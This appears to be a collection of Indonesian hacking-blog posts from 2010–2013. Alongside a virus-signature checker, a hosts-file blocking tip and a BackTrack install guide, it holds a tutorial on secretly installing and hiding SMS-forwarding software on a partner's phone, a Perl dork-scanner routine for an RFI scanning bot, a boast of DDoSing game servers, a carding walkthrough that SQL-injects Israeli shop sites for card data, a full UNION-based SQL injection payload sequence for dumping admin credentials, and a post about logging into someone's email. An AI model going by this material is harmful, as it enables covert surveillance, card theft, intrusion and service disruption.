If GedeFileNya > 40970 Then
    TextExenya = MariMembaca(Dimana)
    If InStr(TextExenya, "µí§¶ýÚÿ×Ðþÿÿ·hþÿÿÿÿÿï¡ùÿÿÿÿÿÿÿÿÿÿÿÿ") > (GedeFileNya - 40970) Then
        CekSiAlmanB = True
    Else
        CekSiAlmanB = False
    End If
Else
    CekSiAlmanB = False
End If
End Function

Private Function MariMembaca(Targetnya As String) As String
Static sTemp As String
Open Targetnya For Binary As #1
    sTemp = Space(LOF(1))
    Get #1, , sTemp
Close #1
MariMembaca = sTemp
End Function

lalu pada command buttonnya masukan text ini
MsgBox "Positif Terinfeksi : " & CekSiAlman(Text1.Text), vbExclamation, "Hasil"

semoga thread ini berguna bagi agan" yang sedang mengembangkan antivirus,supaya antivirus agan bisa mendeteksi file" virus infector..

kl temen2 belum paham..dan males utak atik program Vb bisa langsut sedot aja gan.. monggo 



Thx for HM-TEAM.. 

Sabtu, 19 Oktober 2013

Unlock berbagai merk handphone

Pada kesempatan kali ini saya akan share software untuk unlock kode keamanan HP, yakni World Unlock Codes Calculator v4.4. Buat yang hp nya terkunci karena lupa kode keamanan nya, coba aja gunakan tool ini.

World Unlock Codes Calculator v4.4 ini merupakan sebuah tool yang berfungsi untuk mengunlock kode keamanan hp, bila kita lupa dengan kode keamanan nya dengan menggunakan no IMEI hp anda. Untuk mengetahui no IMEI hp anda, ketik " *#06# " (tanpa tanda kutip).


WorldUnlock Codes Calculator support :
Unlock Nokia
Unlock LG
Unlock Panasonic
Unlock Maxon
Unlock Samsung
Unlock AEG/Telital
Unlock Alcatel
Unlock Siemens
Unlock Sony
Unlock Vitel

jika temen2 berminat download software ny aboisa download ke sini

ada kesempatan kali ini saya akan share software untuk unlock kode keamanan HP, yakni World Unlock Codes Calculator v4.4. Buat yang hp nya terkunci karena lupa kode keamanan nya, coba aja gunakan tool ini.

World Unlock Codes Calculator v4.4 ini merupakan sebuah tool yang berfungsi untuk mengunlock kode keamanan hp, bila kita lupa dengan kode keamanan nya dengan menggunakan no IMEI hp anda. Untuk mengetahui no IMEI hp anda, ketik " *#06# " (tanpa tanda kutip).
mari silahkan download

WorldUnlock Codes Calculator support :
Unlock Nokia
Unlock LG
Unlock Panasonic
Unlock Maxon
Unlock Samsung
Unlock AEG/Telital
Unlock Alcatel
Unlock Siemens
Unlock Sony
Unlock Vitel

Jumat, 18 Oktober 2013

Sadap Sms menggunakan Aplikasi Android

Oke broo.. hari ini saya akn share cara sadap sms menggunakan aplikasi di android

jadi malem kemaren ane nemu nih aplikasi , trus langsung ane coba dan a hundred percent sukses ..

nama appsnya sms watcher lite  *donlod link dibawah*

nah,jadi sebenernya fungsi dari sms watcher lite ini adalah untuk mengontrol atau bahasa kasarnya "menyadap" sms dari hape target.

aplikasi ini merupakan aplikasi parenting control yang sebenernya di negara yang maju, dipakai oleh orang tua untuk mengontrol isi pesan atau sms dari sang anak.

sebelum download ada baiknya ane kasih tutor dulu supaya kaga ada penyalahgunaan.. hehe

- donlod sms watcher lite (ada yang pro ada yang free)

baca dulu ini sebelum lanjut

"SMS Watcher Pro is a parental control application.
It is great for monitoring your children SMS usage and activities.
With so many unsavory characters in cyberspace, you just can not be too careful for their safety."

- setelah di donlod,agan n sist buka apps sms watcher lite *apps ini dipasang pada hape target*

-setelah dibuka maka sms watcher akan meminta agan n sist untuk mengisi password


-setelah password di isi maka agan akan masuk ke menu utama sms watcher lite

- nah dimenu utama ada dua bagian yaitu white list dan forward list
- nah,abaikan white list dan tuliskan nomor agan n sist ke forward list karna memang fungsinya sebagai sms forwarder

- setelah itu save dan keluar

maka sms dari siapapun yang masuk ke hape target akan langsung terforward ke hape agan n sista

sebelum itu bro and sist jangan berbahagia dulu karna menganggap sudah berhasil menyadap sms sang pacar...wkakakak

masih ada satu pekerjaan lagi yaitu untuk menyembunyikan apps ini sehingga korban tidak curiga hapenya disadap

nah karna kemaren ane baru coba yang free maka belum ada fitur invisible,ada cara lain untuk mengakalinya  *dasar otak iblis* wkakakak..

- agan n sist tentu pakai launcher bukan

- nah disini ane pake fitur hide apps dari go launcher ex

- maasuk ke menu screen

- tap tombol menu sehingga sehingga ada 4 menu,nah diantaranya ada hide app

- pilih menu hide app,setelah masuk nmaka centang app yang ingin agan hide

- plong lah pekerjaan kita wkakakak

- skrg ga perlu takut pacar ente selingkuh atau anak ente smsan yang kaga"

DISCLAIMER: Not for illegal use. Not for spying. Accessing mobile device without permission is illegal in most jurisdictions.

akhir kata

Download link *karna ane belum bisa menemukan tmpt download yang bebas kaya blapkmarket jadi di link ke market dulu*
- Market link 

Kamis, 23 Desember 2010

Google multi domain for ur rfi scanner



cuma mau share aja mas" e  mbak" e..
ini aku ada GOOGLE MULTI DOMAIN untuk scanner, jadi biar auto gitu scan nya..

langsung ajaa..
sub se_google_m {
  my ($chan,$key,$nf) = @_;
  my @daftar;
  my $num = 50; my $max = 5000; my $p;
  my @doms = (
    "com","ae","com.ar","at","com.au","be","com.br","ca","ch","cl","de","dk","fi","fr","gr","com.hk",
    "ie","co.il","it","co.jp","co.kr","lt","lv","nl","com.pa","com.pe","pl","pt","ru","com.sg",
    "com.tr","com.tw","com.ua","co.uk","hu","com.af","com","ae","com.ag","com.ai","am","com.ar","as",
    "at","com.au","az","ba","com.bd","be","bg","com.bh","bi","com.bn","com.bo","com.bn","bs","co.bw",
    "com.by","com.bz","ca","cd","cg","ch","ci","co.ck","cl","cn","com.co","co.cr","com.cu","cz","de",
    "dj","dk","dm","com.do","com.ec","ee","com.eg","es","com.et","fi","com.fj","fm","fr","ge","gg",
    "com.gi","gl","gm","gp","gr","com.gt","gy","com.hk","hn","hr","ht","hu","co.id","ie","co.il",
    "im","co.in","is","it","je","com.jm","jo","co.jp","co.ke","com.kh","ki","kg","co.kr","kz","la",
    "li","lk","co.ls","lt","lu","lv","com.ly","co.ma","md","mn","ms","com.mt","mu","mv","mw","com.mx",
    "com.my","com.na","com.nf","com.ng","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa",
    "com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","com.qa","ro","ru","rw","com.sa","com.sb",
    "sc","se","com.sg","sh","si","sk","sn","sm","st","com.sv","co.th","com.tj","tk","tm","to","tp","com.tr",
    "tt","com.tw","com.ua","co.ug","co.uk","com.uy","co.uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws",
    "co.yu","co.za","co.zm","co.zw");
  my $dom = $doms[rand(scalar(@doms))];
  my $url = "http://www.google.".$dom."/search?&num=".$num."&q=".$key;
  my $murl = "http://www.google.".$dom;
  my $nxurl;
  my $q = bukasitus($url);
  if ( $q =~ /class=b><a href=\"(.*?)\">/ ) {
      my $nxurl = $1;
      msgn($dbgchan,"Google.".$dom,$nxurl);
      msgn($chan,"Google.".$dom,"Scanning...");
  }
  while ( $q =~ m/<h3 class=r><a href=\"http:\/\/(.*?)\"/g ) { push (@daftar, $1); }
  for ($p=50;$p<=$max;$p+=$num) {
    $nxurl = "http://www.google.".$dom."/search?num=".$num."&q=".$key."&start=".$p."&sa=N";
    $q = bukasitus($nxurl);
    while ( $q =~ m/<h3 class=r><a href=\"http:\/\/(.*?)\"/g ) {  push (@daftar, $1);  }
    if ( $q !~ /<h3 class=r><a href=\"http:\/\/(.*?)\"/ ) { return @daftar;  }
  }
  return @daftar;
}


untuk selebihnya, silahkan di explore lagi aja
ini kalau mau auto scan nya..
ini contohnya

if (($com =~ /^autoscan\s+(.+?[=])\s+(.*)/) && (fork() == 0)) { a_scanz($dtarget,$1,$2,$hb,1); exit; }

Smoga Bermanfaat..  

Hasil dari DDOS server Zynga Poker



Nah untuk kali ini saya langsung to the point ajaa di karenakan situasi badan yang kurang memungkinkan..
ip=74.114.14.10,name=New York,uCount=5979,maxUsers=7500,status=OK,id=1,type=normal,langPref=eg ip=74.114.14.11,name=Los Angeles,uCount=4592,maxUsers=7500,status=OK,id=2,type=normal,langPref=en ip=74.114.14.12,name=Chicago,uCount=3710,maxUsers=7500,status=OK,id=3,type=normal,langPref=en ​ ip=74.114.14.13,name=Houston,uCount=4968,maxUsers=7500,status=OK,id=4,type=normal,langPref=eg ​ ip=74.114.14.14,name=San Antonio,uCount=4676,maxUsers=7500,status=OK,id=5,type=normal,langPref=eg ip=74.114.14.15,name=Columbus,uCount=3184,maxUsers=7500,status=OK,id=6,type=normal,langPref=e ​n ip=74.114.14.16,name=Istanbul,uCount=1200,maxUsers=7500,status=OK,id=7,type=normal,langPref=t ​r ip=74.114.14.17,name=Madrid,uCount=2730,maxUsers=7500,status=OK,id=8,type=normal,langPref=es ip=74.114.14.18,name=Fort Worth,uCount=4089,maxUsers=7500,status=OK,id=9,type=normal,langPref=eg ip=74.114.14.19,name=Charlotte,uCount=3258,maxUsers=7500,status=OK,id=10,type=normal,langPref ​=en ip=74.114.14.20,name=El Paso,uCount=3803,maxUsers=7500,status=OK,id=11,type=normal,langPref=eg ip=74.114.14.21,name=Ankara,uCount=992,maxUsers=7500,status=OK,id=12,type=normal,langPref=tr ip=74.114.14.22,name=Barcelona,uCount=2723,maxUsers=7500,status=OK,id=13,type=normal,langPref ​=es ip=74.114.14.23,name=Boston,uCount=3248,maxUsers=7500,status=OK,id=14,type=normal,langPref=en ​ ip=74.114.14.24,name=Denver,uCount=3702,maxUsers=7500,status=OK,id=15,type=normal,langPref=eg ​ ip=74.114.14.25,name=Washington DC,uCount=3263,maxUsers=7500,status=OK,id=16,type=normal,langPref=en ip=74.114.14.26,name=Nashville,uCount=3852,maxUsers=7500,status=OK,id=17,type=normal,langPref ​=eg ip=74.114.14.27,name=Las Vegas,uCount=3246,maxUsers=7500,status=OK,id=18,type=normal,langPref=en ip=74.114.14.28,name=Portland,uCount=3199,maxUsers=7500,status=OK,id=19,type=normal,langPref= ​en ip=74.114.14.29,name=Tucson,uCount=3742,maxUsers=7500,status=OK,id=20,type=normal,langPref=eg ​ ip=74.114.14.30,name=Albuquerque,uCount=3254,maxUsers=7500,status=OK,id=21,type=normal,langPr ​ef=en ip=74.114.14.31,name=Izmir,uCount=1069,maxUsers=7500,status=OK,id=22,type=normal,langPref=tr ip=74.114.14.32,name=Valencia,uCount=2583,maxUsers=7500,status=OK,id=23,type=normal,langPref= ​es ip=74.114.14.33,name=Atlanta,uCount=3841,maxUsers=7500,status=OK,id=24,type=normal,langPref=e ​g ip=74.114.14.34,name=Sacramento,uCount=3273,maxUsers=7500,status=OK,id=25,type=normal,langPre ​f=en ip=74.114.14.35,name=New Orleans,uCount=3224,maxUsers=7500,status=OK,id=26,type=normal,langPref=en ip=74.114.14.36,name=Cleveland,uCount=3610,maxUsers=7500,status=OK,id=27,type=normal,langPref ​=eg ip=74.114.14.37,name=Kansas City,uCount=3185,maxUsers=7500,status=OK,id=28,type=normal,langPref=en ip=74.114.14.38,name=Omaha,uCount=3760,maxUsers=7500,status=OK,id=29,type=normal,langPref=eg ip=74.114.14.39,name=Miami,uCount=3251,maxUsers=7500,status=OK,id=30,type=normal,langPref=en ip=74.114.14.40,name=Mesa,uCount=3209,maxUsers=7500,status=OK,id=31,type=normal,langPref=en ip=74.114.14.41,name=Virginia Beach,uCount=3692,maxUsers=7500,status=OK,id=32,type=normal,langPref=eg ip=74.114.14.42,name=Temecula,uCount=3253,maxUsers=7500,status=OK,id=33,type=normal,langPref= ​en ip=74.114.14.43,name=Berkeley,uCount=3243,maxUsers=7500,status=OK,id=34,type=normal,langPref= ​en ip=74.114.14.44,name=Tulsa,uCount=3213,maxUsers=7500,status=OK,id=35,type=normal,langPref=en ip=74.114.14.45,name=Honolulu,uCount=3288,maxUsers=7500,status=OK,id=36,type=normal,langPref= ​en ip=74.114.14.46,name=Minneapolis,uCount=3844,maxUsers=7500,status=OK,id=37,type=normal,langPr ​ef=eg ip=74.114.14.47,name=Colorado Springs,uCount=3263,maxUsers=7500,status=OK,id=38,type=normal,langPref=en ip=74.114.14.48,name=San Diego,uCount=3215,maxUsers=7500,status=OK,id=39,type=normal,langPref=en ip=74.114.14.49,name=Bursa,uCount=871,maxUsers=7500,status=OK,id=40,type=normal,langPref=tr ip=74.114.14.50,name=Dallas,uCount=3215,maxUsers=7500,status=OK,id=41,type=normal,langPref=en ​ ip=74.114.14.51,name=San Jose,uCount=3554,maxUsers=7500,status=OK,id=42,type=normal,langPref=eg ip=74.114.14.52,name=Indianapolis,uCount=3249,maxUsers=7500,status=OK,id=43,type=normal,langP ​ref=en ip=74.114.14.53,name=Jacksonville,uCount=3722,maxUsers=7500,status=OK,id=44,type=normal,langP ​ref=eg ip=74.114.14.54,name=San Francisco,uCount=3252,maxUsers=7500,status=OK,id=45,type=normal,langPref=en ip=74.114.14.55,name=Austin,uCount=3681,maxUsers=7500,status=OK,id=46,type=normal,langPref=eg ​ ip=74.114.14.56,name=Memphis,uCount=3209,maxUsers=7500,status=OK,id=47,type=normal,langPref=e ​n ip=74.114.14.57,name=Baltimore,uCount=3817,maxUsers=7500,status=OK,id=48,type=normal,langPref ​=eg ip=74.114.14.58,name=Philadelphia,uCount=3272,maxUsers=7500,status=OK,id=49,type=normal,langP ​ref=en ip=74.114.14.59,name=Phoenix,uCount=3236,maxUsers=7500,status=OK,id=50,type=normal,langPref=e ​n ip=74.114.14.60,name=Milwaukee,uCount=3610,maxUsers=7500,status=OK,id=51,type=normal,langPref ​=eg ip=74.114.14.61,name=Seattle,uCount=3240,maxUsers=7500,status=OK,id=52,type=normal,langPref=e ​n ip=74.114.14.62,name=Detroit,uCount=3262,maxUsers=7500,status=OK,id=53,type=normal,langPref=e ​n ip=74.114.14.63,name=Oakland,uCount=3466,maxUsers=7500,status=OK,id=54,type=normal,langPref=e ​g ip=74.114.14.64,name=Raleigh,uCount=3628,maxUsers=7500,status=OK,id=55,type=normal,langPref=e ​g ip=74.114.14.65,name=Wichita,uCount=3607,maxUsers=7500,status=OK,id=56,type=normal,langPref=e ​g ip=74.114.14.66,name=St Louis,uCount=3225,maxUsers=7500,status=OK,id=57,type=normal,langPref=en ip=74.114.14.67,name=Cincinnati,uCount=3275,maxUsers=7500,status=OK,id=58,type=normal,langPre ​f=en ip=74.114.14.68,name=Louisville,uCount=3233,maxUsers=7500,status=OK,id=59,type=normal,langPre ​f=en ip=74.114.14.69,name=California,uCount=3532,maxUsers=7500,status=OK,id=60,type=normal,langPre ​f=cl ip=74.114.14.70,name=SitNGo 1,uCount=2216,maxUsers=7500,status=OK,id=61,type=sitngo,langPref=en ip=74.114.14.71,name=SitNGo 2,uCount=2231,maxUsers=7500,status=OK,id=62,type=sitngo,langPref=en ip=74.114.14.72,name=SitNGo 3,uCount=2214,maxUsers=7500,status=OK,id=63,type=sitngo,langPref=en ip=74.114.14.73,name=SitNGo 4,uCount=2205,maxUsers=7500,status=OK,id=64,type=sitngo,langPref=en ip=74.114.14.74,name=Weekly Tourney 1,uCount=401,maxUsers=7500,status=OK,id=65,type=tourney,langPref=en ip=74.114.14.75,name=Weekly Tourney 2,uCount=459,maxUsers=7500,status=OK,id=66,type=tourney,langPref=en ip=74.114.14.76,name=VIP 1,uCount=571,maxUsers=7500,status=OK,id=67,type=vip,langPref=en ip=74.114.14.77,name=VIP 2,uCount=627,maxUsers=7500,status=OK,id=68,type=vip,langPref=en ip=74.114.14.78,name=Shootout 1,uCount=1738,maxUsers=7500,status=OK,id=69,type=shootout1,langPref=en ip=74.114.14.79,name=Shootout 2,uCount=1731,maxUsers=7500,status=OK,id=70,type=shootout1,langPref=en ip=74.114.14.80,name=Shootout 3,uCount=1733,maxUsers=7500,status=OK,id=71,type=shootout1,langPref=en ip=74.114.14.81,name=Shootout 4,uCount=1671,maxUsers=7500,status=OK,id=72,type=shootout1,langPref=en ip=74.114.14.82,name=Shootout 5,uCount=1725,maxUsers=7500,status=OK,id=73,type=shootout1,langPref=en ip=74.114.14.83,name=Shootout 6,uCount=1705,maxUsers=7500,status=OK,id=74,type=shootout1,langPref=en ip=74.114.14.84,name=Shootout 7,uCount=1721,maxUsers=7500,status=OK,id=75,type=shootout1,langPref=en ip=74.114.14.85,name=Shootout 8,uCount=892,maxUsers=7500,status=OK,id=76,type=shootout3,langPref=en ip=74.114.14.86,name=Shootout 9,uCount=915,maxUsers=7500,status=OK,id=77,type=shootout3,langPref=en ip=74.114.14.87,name=Shootout 10,uCount=931,maxUsers=7500,status=OK,id=78,type=shootout3,langPref=en ip=74.114.14.88,name=Shootout 11,uCount=878,maxUsers=7500,status=OK,id=79,type=shootout3,langPref=en ip=74.114.14.89,name=Shootout 12,uCount=911,maxUsers=7500,status=OK,id=80,type=shootout3,langPref=en

tiap 1 meja punya 1 Ip ...!!

nah..!!

kita cuba DDOS 1 IP nya,,,!! minimal kita pake banyak IP Server untuk men DDOSnya..!!!

tapi sebelum itu kita masuk Meja yang kita mau DDOS..!!

apa yang terjadi..??

ternyata

aku coba ama temenku DDOS Ip : ip=74.114.14.11,name=Los Angeles,uCount=4592,maxUsers=7500,status=OK,id=2,type=normal,langPref=en

dengan 47 Ip berbeda ..!! 1 IP = 3 Bot ,,,hihih bnyak yach ^_^

nich hasilnye..!!

ternyata hasilnya..!! servernya Hanya Down.!!

padhal Aku tunggu tunggu..!! chipnya berhamburan ,,,!! ternyata gk ada ikh..!!

tapi aku LEGa Juga...!!

krna aku bisa tahu Hasilnya..!! walaupun gk menghasilkan apa apa ^_^... 


Step by step carding

kali ini saya membuat tutorial carding yg dimana target yg kuserang adalah masyarakat yahudi / israel
sebener nya ini tutor buat yg cupu kayak saya, hehehehe..

tools yg di siapkan yaitu:
1google extractor
2Sql exploiter versi brp aja

 tahap tahap yg di lakukan 1
buka google extractor, lalu masukan dork product.asp?id= site:il (harus il, kalo .id jangan sampe, awas kalo sampe id)
trus scan, kalo sudah muncul link" yg kluar silah kan di klick kanan trus remove duplicate, biar ga keder



lalu pindah ke TAB sql injector query builder
masukan argumen tanda tanya(?)di insert arguments here
kalo sudah klick Build Dan Scan






trus ke tab berikut nya yaitu tab attack victim
cari yg error result nya : unclosed quotation mark before the character ..... ga tau knp pokok nya ikutin aja jgn banyak tanya :p
klick kanan copy url yg victim






tahap pemakaian sql exploiter2
buka sql exploiter trus ke tab attacker for the hackable SHIT !!
klik add manualy , masukan url yg victim tadi, trus paste (kadang tanda ' harus di hilangkan)





kalo udah klick site info sampe info nya keluar
kalo udah keluar maka tingal get table, maka akan muncul table" web tersebut, yg ku tandai warna biru






pilih salah 1 yg ada di table tsbt, yg kira" dimana letak CC nya, trus get columb buat mengetahui colum apa aja di table tsb, tapi x ini aku ga ke table order
kalo udah muncul smua colomb , drag smua colom trus get data



Smoga bermanfaat..

Jumat, 17 Desember 2010

SQL injection step by step

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E--

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .


Smoga Bermanfaat..

Sabtu, 13 November 2010

Mengambil keyloger orang lain

Mohan maaf artikel ini hanya untuk pengetahuan bukan untuk kejahatan. Semuanya di kembalikan kepada anda.
Di sini saya mendapatkan sebuah keyloger diwarnet , cara ceknya tergantung key nya.. seperti contoh di sini Menggunaka  Remfog emyoled monitor. Pertama saya sih sempat terkecoh. Programnya bagus tapi ada kelemahannya, PASS EMAIL tujuan masih tersimpan dalam bentuk aristerik. Pass aristerik tidak menjamin aman.


Ini adalah tampilannya. Info yang bisa kita dapat dari keyloger tersebut adalah email tujuan dan pass DF. Karena dia sempat menukar pass dFtapi masih bisa di lihat dari keloger tersebut.
Sebelum dia memasang dia musti membuka DF terlebih dahulu , saat memasukan pass DF pasti akan tersimpan di reportnya. Perhatikan gambar di bawah ini :

Di sana terlihat dia merubah pass DF dengan nama “KUN”. Di sini kita bisa lihat program apa saja yang dia gunakan dan cara kerjannya..
Saat anda menuju ke delivery anda akan melihat informasi sebagai berikut :


Info yang di dapat adalah :
Email tujuan Dan Password email. 2 informasi tersebut yang penting.
Untuk membuka password yang berbentu aristerik bisa menggunakan program yang bisa anda download di sini :

mencoba lakukan login ke emailnya ternyata berhasil, apa yang saya lihat di email tersebut. Ternyata ada beberapa report warnet yang masuk



Untuk nama warnetnya saya blok untuk privasi.

Ini adalah salah satu report yang saya buka. Sebelumnya semua informasi ini tidak akan saya sebarkan, karena mengingat kerugian yang kepada sikorban. Karena sekarang email ini telah saya lakukan untuk perubahan password, supaya keylogernya tidak aktif lagi.
Mungkin sekian artikel saya, saya ucapkan terima kasih.
“Berhati2lah saya berselancar di Internet”

Jumat, 12 November 2010

BLOKIR SITUS PORNO TANPA “SOFTWARE”

Artikel lama..tapi mayan lah kalau di sharing lagi :D
sebenarnya trik mudah kok.. hanya nambah daftar link/ip standart ke dalam host komp. seperti ip 127.0.0.1 akan secara otomatis ,masuk ke localhost..

disana saat mengetikan ip 127.0.0.1 atau anda ketikan localhost akan masuk ke web localhost…
pengaturan ini bisa anda lihat d
C:\WINDOWS\system32\drivers\etc
dan buka file “hosts”. isi feli tersebut adalah :
======================================================
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a ‘#’ symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host
127.0.0.1       localhost
=======================================================
d sana terlihat bahwa ip 127.0.0.1 ada localhost, seandainya kita coba tambah atau ganti ip 127.0.0.1 dengan ip sebuah situs, apa yg bakal terjadi…
saya akan menukar 127.0.0.1 dengan 203.190.241.201 yaitu ip detik.com
yg terjadi adalah.situs portal detik.com masih dapat terbuka.. :(
sekarang coba kita balikan. ip 127.0.0.1 localhost d ganti dengan detik.com
wkwkwkw akhirnya berhasil… saat browsing ke detik.com yg keluar tampilan localhost…
anda bisa merubah sebuah link ke link localhost….
dengan trik ini kita bisa memblokir situs porno..
tapi tidaklah sempurnah pemblokirannya. kapan2 saya akan tulis cara blokir situs yg agak sempurna..
sampai sekian trik dari saya.. thanks yg telah membaca..

Smoga Bermanfaat..

Kamis, 04 November 2010

Install Backtrack 4 Pre Final on Harddisk


Backtrack 4 pre final telah di rilis dan proses installasi ke hardisk pun sangat mudah .
Pastikan anda sudah mendownload iso backtrack 4 dan check md5 nya untuk memastikan file iso backtrack 4 anda tidak corrupt. Serta Jangan lupa backup data2 di komputer anda untuk antisipasi kesalahan partisi .
Berikut ini adalah langkah” installasi backtrack 4 pada harddisk :
1. Buat 2 buah partisi yaitu partisi extended 3 dan partisi untuk swap .
anda bisa menggunakan software partition magic (bagi pengguna windows), atau dengan command “fdisk” apabila
menggunakan linux.
2. Booting dengan cd backtrack 4 pre final, kemudian ketikkan perintah : “sudo su”
Contoh :
code-soft@bt:$ sudo su
code-soft@bt:./home/code-soft#

3. Masuk ke desktop dengan cara ketikkan “startx”
code-soft@bt:/home/code-soft# startx
4. Klik file “install.sh” yang ada pada desktop .
5. Tunggu beberapa saat hingga popup muncul , klik “continue anyway” jika ada pesan error “language crashed”
6. Pilih Lokasi anda : “Jakarta”, kemudian klk forward
7. Pilih keyboard layout : USA, klik forward
8. Pilih “Manual” pada saat proses prepare disk space, kemudian klik forward
9. Arahkan dan edit partisi yang akan di install linux, misal partisi /dev/sda6 untuk linux nya dan /dev/sda7 untuk swap nya.
*disesuaikan dengan partisi yang ada pada komputer anda.
10. Klik pada /dev/sda6 , Klik edit untuk mengedit partisi /dev/sda6.
Isi pilihan use as dengan “ext 3 journaling file system”
ceklist “format the partition”
Isi mount point dengan pilihan “ / ”
Klik OK
11. Selanjutnya klik pada /dev/sda7 kemudian edit partition, klik OK.
12. Setelah selesai edit partisi, selanjutnya klik Forward pada proses prepare install .
13. Isi kan nama, password, dana nama komputer anda, kemudian klik forward
14. Pada proses migrate documents and settings , klik forward
15. Klik Install pada untuk memulai installasi tunggu hingga selesai
16. Finished. Silahkan reboot komputer anda.dan keluarkan cd backtrack .
Selamat anda telah berhasil install backtrack 4 pre final.
Smoga bermanfaat.